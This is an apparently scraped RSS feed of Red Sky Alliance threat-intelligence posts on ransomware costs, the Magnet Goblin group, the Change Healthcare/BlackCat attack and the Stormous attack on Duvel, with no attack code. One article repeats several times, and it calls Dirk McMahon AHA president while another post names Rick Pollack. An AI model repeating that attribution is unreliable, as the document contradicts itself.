ransomware - X-Industry - Red Sky Alliance (feed updated 2024-03-28T19:53:44Z)
https://redskyalliance.org/xindustry/feed/tag/ransomware
Ransomware: The Actual Cost to Businesses
https://redskyalliance.org/xindustry/ransomware-the-actual-cost-to-businesses
2024-03-20T16:00:00.000Z, Jim McKee (https://redskyalliance.org/members/JimMcKee)
<div><p>A leading cyber security firm, Cybereason<a href="#_ftn1">[1]</a>, has announced the results of its third annual ransomware study, commissioned to better understand the true impact of ransomware on businesses. This global study reveals that ransomware attacks are becoming more frequent, effective, and sophisticated.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/100-50-1-100-ransomware-gangs-using-50-types-of-malware">https://redskyalliance.org/xindustry/100-50-1-100-ransomware-gangs-using-50-types-of-malware</a></p>
<p>The report, Ransomware: The True Cost to Business 2024, reveals that of the organizations that opted to pay a ransom to regain access to their encrypted systems, only 47% received their data and systems back uncorrupted.<a href="#_ftn2">[2]</a></p>
<p>Key Findings:</p>
<ul>
<li>56 percent of organizations surveyed suffered more than one ransomware attack in the last 24 months.</li>
<li>It still ‘doesn’t pay to pay’ as almost 80 percent of organizations who paid the ransom were hit a second time.</li>
<li>82 percent were hit again within a year.</li>
<li>63 percent were asked to pay again.</li>
</ul>
<p>These findings emphasize why it does not pay to pay ransomware attackers, and organizations should instead focus on detection and prevention tactics to end ransomware attacks before material damage occurs.</p>
<p>Cybereason Global Field CISO Greg Day says this year’s research shows that, while most businesses have a ransomware strategy, many are incomplete. “They’re either missing a documented plan or the right people to execute it. As a result, we see that many organizations are paying the ransom.... Likewise, while many have cyber insurance, too many don’t know if, or to what degree, it covers them for ransomware attacks. This is problematic on several levels. It’s no guarantee that attackers won’t sell your data on the black market, that you’ll even get your full files and systems back, or that you won’t be attacked again.”</p>
<p>Other Findings:</p>
<ul>
<li>Attackers are evolving, and the supply chain shows weakness. 56 percent did not detect a breach for 3-12 months, and 41 percent of the attackers got in via a supply chain partner.</li>
<li>Attacker demands increased at every stage; 78 percent were breached a second time, and 63 percent were asked to pay more.</li>
<li>The actual cost is staggering: 46 percent estimated total business losses of $1-10 million, and 16 percent estimated total business losses of over $10 million, not to mention the loss of revenue, brand damage, and layoffs that followed.</li>
<li>Businesses lack the right tools. Less than half said their enterprises are adequately prepared for the next attack. While 87 percent of organizations increased spending, only 41 percent feel they have the right people and plans to manage the next attack.</li>
</ul>
<p>Based on Cybereason's research and its unique threat protection capabilities, it seems clear that in the case of ransomware attacks, prevention is a whole lot better than remediation.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<ul>
<li>Reporting: https://www.redskyalliance.org/</li>
<li>Website: https://www.redskyalliance.com/</li>
<li>LinkedIn: https://www.linkedin.com/company/64265941</li>
</ul>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.cybereason.com">https://www.cybereason.com</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.cybersecurityintelligence.com/blog/ransomware-the-true-cost-to-business-7501.html">https://www.cybersecurityintelligence.com/blog/ransomware-the-true-cost-to-business-7501.html</a></p></div>
Meet the Magnet Goblin Hacker Group
https://redskyalliance.org/xindustry/meet-the-magnet-goblin-hacker-group
2024-03-18T16:00:00.000Z, Jim McKee (https://redskyalliance.org/members/JimMcKee)
<div><p>Magnet Goblin, a financially motivated threat actor, is swiftly adopting one-day security vulnerabilities into its arsenal to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts. The group's hallmark is its ability to quickly leverage newly disclosed vulnerabilities, mainly targeting public-facing servers and edge devices. In some cases it deploys exploits within one day of a proof-of-concept being published, which significantly increases the threat level posed by this actor.</p>
<p>Attacks mounted by the adversary have leveraged unpatched Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ servers as an initial infection vector to gain unauthorized access. The group is said to have been active since at least January 2022.</p>
<p>Successful exploitation is followed by deploying a cross-platform remote access trojan (RAT) dubbed Nerbian RAT, first disclosed by Proofpoint in May 2022, and its simplified variant called MiniNerbian. Darktrace previously highlighted the use of the Linux version of Nerbian RAT. Both strains allow for executing arbitrary commands received from a command-and-control (C2) server and exfiltrating the results back to it.</p>
<p>Some of Magnet Goblin's other tools include the WARPWIRE JavaScript credential stealer, the Go-based tunneling software known as Ligolo, and legitimate remote desktop offerings such as AnyDesk and ScreenConnect. Magnet Goblin, whose campaigns appear to be financially motivated, has quickly adopted 1-day vulnerabilities to deliver its custom Linux malware, Nerbian RAT and MiniNerbian. Those tools operate under the radar because they primarily reside on edge devices, which is part of an ongoing trend of threat actors targeting unprotected areas.</p>
</div>
Hospitals Seek Federal Help
https://redskyalliance.org/xindustry/hospitals-seek-federal-help
2024-03-14T12:00:00.000Z, Jim McKee (https://redskyalliance.org/members/JimMcKee)
<div><p>The unprecedented cyberattack on Change Healthcare<a href="#_ftn1">[1]</a>, a major revenue cycle management firm, has thrown the US healthcare system into a financial mess. With payment systems crippled, hospitals are demanding federal intervention to avert an economic crisis that could imperil care delivery. Change Healthcare is a revenue and payment cycle management provider that connects payers, providers, and patients within the U.S. healthcare system. The name also refers to a company founded in 2007 that became part of the current conglomerate.<a href="#_ftn2">[2]</a></p>
<p>The American Hospital Association (AHA) has pressured Congress and the White House to take extraordinary measures supporting providers impacted by the ongoing disruptions at the UnitedHealth Group subsidiary. In a letter to leaders like Senate Majority Leader Chuck Schumer, the AHA warned the 13-day incident "demands a whole of government response."</p>
<p>"This attack has already imposed significant consequences on patients and the hospitals, health systems, and other providers who care for them," wrote AHA President Rick Pollack. He cited patients struggling to get care, billions in halted cash flows threatening provider viability, and skyrocketing administrative costs from laborious manual workarounds.</p>
<p>The AHA criticized UnitedHealth's temporary funding assistance program as "not even a band-aid (ha!) on the payment problems" and called for bold federal actions like expediting Medicare advance payments and compelling more support from the healthcare giant. The crisis has cybersecurity experts debating the merits of potential government intervention. "Federal agencies can play a pivotal role... offering support to the affected entities in a number of ways both in the short term and long term," said Darren Guccione, CEO of Keeper Security, outlining roles for the FBI, CISA, and NIST.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/cyber-attacks-on-hospitals">https://redskyalliance.org/xindustry/cyber-attacks-on-hospitals</a></p>
<p>Critical Start's Chad Graham cautioned that such intervention could create "a moral hazard, reducing the incentive for healthcare institutions to invest in robust cybersecurity measures." Yet he acknowledged it may be needed to "prevent potentially catastrophic disruptions in patient care."</p>
<p>Menlo Security's Ngoc Bui alleged the attack is linked to the prolific BlackCat ransomware gang, speculating they pulled an "exit scam" after getting paid to avoid law enforcement. As hospitals plead for a financial lifeline, experts agree the situation underscores the cyber vulnerability of healthcare's critical infrastructure and the need for a holistic strategy balancing immediate incident response and long-term resilience.</p>
<p>Jim McKee, CEO of Red Sky Alliance Corp., stated, “Hackers cannot be taught that a third party will pay all of their demands to solve the ransomware problem. This will only increase the number and price tags of never-ending cyberattacks. Organizations need to prioritize their budgets to defend against these attacks in the first place.”</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.changehealthcare.com">https://www.changehealthcare.com</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.secureworld.io/industry-news/hospitals-seek-federal-help-ransomware/">https://www.secureworld.io/industry-news/hospitals-seek-federal-help-ransomware/</a></p></div>
Stormous Gang - Stopped the Flow
https://redskyalliance.org/xindustry/stormous-gang-stopped-the-flow
2024-03-13T11:10:00.000Z, Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>The Stormous ransomware gang has taken credit for an attack on a major Belgian beer producer this week. The ransomware attack on Duvel Moortgat Brewery has affected operations for days. Can you believe it? Who wants to stop the flow of beer? Local news outlets and BleepingComputer reported on Wednesday that Duvel’s IT department detected the attack and shut down production lines. Spokesperson Ellen Aerts told reporters that they are “still working to find out exactly what happened.” “We have decided to switch off our servers and as a result production is at a standstill at all our Belgian sites and at our site in the United States,” she said. “We are confident that we will be able to restart production soon. In the meantime, there is enough stock, so Duvel drinkers don’t have to worry.”</p>
<p>The company was added to Stormous’ leak site on March 7<sup>th</sup> with the group claiming to have stolen 88 gigabytes of data from Duvel. The gang gave the brewer a deadline of March 25 to pay the ransom. The company did not respond to requests for comment about the situation.<a href="#_ftn1">[1]</a></p>
<p>The incident comes amid growing interest in Stormous ransomware following their announced alliance with GhostSec, a financially-motivated hacking group conducting single and double-extortion attacks that has ramped up its activity over the last year, according to Cisco Talos.</p>
<p>Researchers published a report this week about the alliance between the two groups, finding that they are “operating together to conduct… double extortion attacks” on victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkey, Egypt, Vietnam, Thailand and Indonesia.</p>
<p>GhostSec has also been active on its Telegram channel in highlighting its attacks on Israel’s industrial systems, critical infrastructure and technology companies. In recent months the group has claimed to be part of an alliance called the “Five Families,” which includes the hacking groups ThreatSec, Stormous, Blackforums and SiegedSec. “Their claims also showed us that their primary focus is raising funds for hacktivists and threat actors through their cybercriminal activities,” Cisco researchers said.</p>
<p>GhostSec began to collaborate with the Stormous ransomware gang in July 2023 in several alleged attacks on government organizations in Cuba. By October, the two groups announced a partnership and GhostSec unveiled a new ransomware-as-a-service (RaaS) operation called GhostLocker. Since then, the groups have collaborated on several attacks while evolving their offerings to include methods for independent hackers to use their platform to simply sell or publish stolen data.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/stormous-claims-duvel-beer-attack/">https://therecord.media/stormous-claims-duvel-beer-attack/</a></p></div>
Healthcare Hit on Rx.
https://redskyalliance.org/xindustry/healthcare-hit-on-rx
2024-03-07T17:20:00.000Z, Bill Schenkelberg (https://redskyalliance.org/members/BillSchenkelberg)
<div><p>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide, of failing to adequately address the issues healthcare providers face in getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation.”</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
